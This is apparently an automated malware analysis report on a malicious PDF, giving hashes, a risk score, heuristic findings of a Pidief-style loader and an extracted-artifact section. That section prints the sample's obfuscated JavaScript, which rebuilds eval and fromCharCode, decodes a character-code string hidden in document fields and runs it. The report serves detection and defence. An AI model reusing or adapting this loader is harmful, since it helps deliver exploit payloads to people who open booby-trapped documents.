Malicious PDF — malware analysis report

Static analysis result for SHA-256 32c77187a32978f3…

MALICIOUS

PDF

44.6 KB Authoring application: substr First seen: 2012-10-18
MD5: de9b5b490011f3da0bdb24d0a9fba000 SHA-1: 2ca1713cdbe584da7f01346131c1527704f52d9a SHA-256: 32c77187a32978f3552b89a31058b27076457560500d9b4ec905dd3d4c020163
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file contains embedded JavaScript, indicated by heuristic firings for PDF_JAVASCRIPT and PDF_JS. The ML classifier strongly flagged this PDF as malicious. While no specific malicious actions are detailed in the extracted body text or scripts, the presence of JavaScript within a PDF is a common technique for delivering malicious payloads or initiating further compromise. The confidence is high due to the ML score, but the exact payload and family remain unknown without further analysis of the JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xAFA9 439 bytes
SHA-256: fb582b3ba6afc8a1d0fb19229fe6f9c7f1ea0d2e03f264acaf584550d13bcd75
Preview script
First 1,000 lines of the extracted script
s2='';
v=producer;
t='le';
b='v';
a="e".concat("a","n","b","w",b,"o");
s=a[0].concat(b,a[1],t[0]);
e=v[v]()[s];
nut=e('ti'.concat(v[4],t));
q=nut[v](a.length-6,a.length+2);
raec=e(v[0].toUpperCase().concat(v[4],'ring.f',q[4],a[6],q));
q=nut[v](t.length+12)[e(v[0]+'ubjec'+v[4])]('c');
k=q['len'.concat('gth')];
i=0;
while(i!=k){
	cxn = 1*(q[i]);
	i++;
	cxn -= (-1)*(q[i]);
	s2 = s2.concat(raec(cxn));
	i++;
}
e(s2);